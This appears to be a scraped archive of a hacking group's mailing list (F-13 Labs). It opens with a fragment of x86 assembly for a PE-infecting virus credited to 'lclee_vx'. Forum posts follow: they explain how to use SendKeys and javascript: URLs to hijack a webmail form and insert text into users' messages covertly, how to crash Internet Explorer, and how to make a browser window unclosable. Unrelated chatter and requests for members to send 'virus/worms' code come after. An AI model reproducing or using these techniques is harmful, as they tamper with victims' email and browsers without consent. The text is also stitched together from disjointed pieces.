                                  DB 3 DUP (?)      ; dword padding
  win32_find_data                 ENDS              ;
                                                    ;
  W32FindData    win32_find_data ?                  ; our search area

PESection 				 STRUC

	 nsname 				 db 8
dup (0)
	 nsvirtualsize 		 dd  0
	 nsRVA 				 dd 0
	 nsphysicalsize 		 dd 0
	 nsphysicaloffset 	 dd 0
	 nsreserved 			 db 12
dup (0)
	 nsflags 				 dd 0
PESection ends

RubbishSize  equ (offset Delta - offset VirusStart)
		 ;redundant size
VirusSize  equ (offset VirusEnd-offset VirusStart)
		 ;total size of virus
SecVirSize  equ 1000h
SecVirPadd  equ 1000h
Char 	 equ 0E0000020h
					 ;read, write, executable

szTopic 	 db "F-13 Labs", 0
szText 	 db "Coded by lclee_vx", 0


FirstGeneration:

	 push 0
	 lea  eax, [ebp+offset szTopic]
	 push eax
	 lea  eax, [ebp+offset szText]
	 push eax
	 push 0
	 mov  eax, [ebp+offset aMessageBoxA]
	 call eax

	 ret
VirusEnd:
ends

end VirusStart

Did you try to change body.innerHTML with javascript yet
it may work on Other WebBrowser(TestedWithOpera) except IE it will
show you
IE cannot open the ...
Operation Aborted

Yes it will show this only remote file.
I don't know it's an IE security or LogicalError.

But U can use this code to block IE such

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http:/
/www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
11">
<title>BlockIE</title>
</head>
<body>
The body
</body>
<script language="javascript">
document.body.innerHTML+=" ";
</script>
</html>




Enjoy coding.

in IE U can Sendkeys
Alt+D(%D) to make Address bar focused.
and send any Eng Key to check if language is English and no Caplock.
pass your script code(by SendKeys) Using "javascript:...(your own
javascript code)Line1;Line2;Line3;..."
to change mail form submit behavior such
document.mailform.submitelement.onclick
don't forget to check target document is the real target document.
such count HTMLtag (Using document.getElementsByTagName) Get Some
identify HTMLComments (Using document.body.innerHTML) Count Elements
in e-mail form etc.

if user click the submit elements you can add your own message into
mail body before submit them to the server.
after you add your own script don't forget to clear addressbar.
By send key Alt+D and Esc




Add: (Funny script for you)
with new IE security
while you use script windows.close();
it will show Yes/No DialogBox ask user such
The document trying to close the window do you want to close it?
if user Click No the windows will not Close
but if you call more of this function
such
function unclosable(){
windows.close();
unclosable();
}
unclosable();

The IE window will be unclosable
it will ask old question althought user click No or Yes.

Note: I can' use English Language fluently.
You can tell me while I make a mistake.

hi,,~~

     do you know the game GO,also named wei-chi.In china,it's very
popular.I like GO,but i like the GO programming more,especially the AI
sillis in the programming, guys, what about you,,,,:D

hi,,~~

     do you know the game GO,also named wei-chi.In china,it's very
popular.I like GO,but i like the GO programming more,especially the AI
sillis in the programming, guys, what about you,,,,:D

ohh...ok.

Welcome to this forum, will add samurian in our group later..and
schedule to contribute the reverse engine paper..:)

--- In F-13Labs@yahoogroups.com, "moaphie_z6" <prommas_6@...> wrote:
>
> hi lclee_vx...this guy Samurian is my classmate he's very good in
> programming,web programming,and reverse engine...i hope this guy can
> help us much !
>

hi lclee_vx...this guy Samurian is my classmate he's very good in
programming,web programming,and reverse engine...i hope this guy can
help us much !

hai, samur..

Sorry too late reply the messages, can give us ur:

personal website,
and codes (virus/worms..etc)

Pls send to my mailbox lclee_vx@...

cheer


--- In F-13Labs@yahoogroups.com, "samuriantarsanitari"
<samuriantarsanitari@...> wrote:
>
> i will join you!
>